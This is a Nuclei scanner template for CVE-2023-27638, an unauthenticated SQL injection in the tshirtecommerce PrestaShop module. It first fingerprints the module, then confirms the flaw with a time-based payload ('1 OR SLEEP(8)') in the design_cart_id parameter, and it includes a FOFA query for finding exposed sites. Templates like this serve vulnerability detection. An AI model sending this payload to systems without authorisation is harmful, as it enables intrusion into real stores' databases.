CVE-2023-27638: tshirtecommerce PrestaShop Module - SQL Injection

id: CVE-2023-27638

info:
  name: tshirtecommerce PrestaShop Module - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    The tshirtecommerce module for PrestaShop is vulnerable to unauthenticated SQL injection via the tshirtecommerce_design_cart_id parameter, allowing attackers to execute arbitrary SQL queries and extract sensitive information from the database. This is due to lack of input sanitization, as shown in the patch where pSQL() is now used.
  remediation: |
    Update the tshirtecommerce module to the latest version and apply all security patches.
  reference:
    - https://security.friendsofpresta.org/module/2023/03/21/tshirtecommerce_cwe-89.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27638
  classification:
    cve-id: CVE-2023-27638
    cwe-id: CWE-89
    epss-score: 0.4973
    epss-percentile: 0.97741
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 1
    vendor: tshirtecommerce
    product: prestashop
    fofa-query: body="Prestashop" && body="tshirtecommerce"
  tags: cve,cve2023,prestashop,tshirtecommerce,sqli

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - "contains_all(tolower(body), 'prestashop', 'tshirtecommerce')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /module/tshirtecommerce/designer?tshirtecommerce_design_cart_id=1%20OR%20SLEEP(8) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=8"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100acfc3808b799f5b3e3b351a085cb051c8cd6dc45df8b4edd90f670ee16cd1c34022100811702ca30246f571eaacaf01545f7a8c0ba6611bb5d09689cd1c626c568e5d7:922c64590222798bb761d5b6d8e72950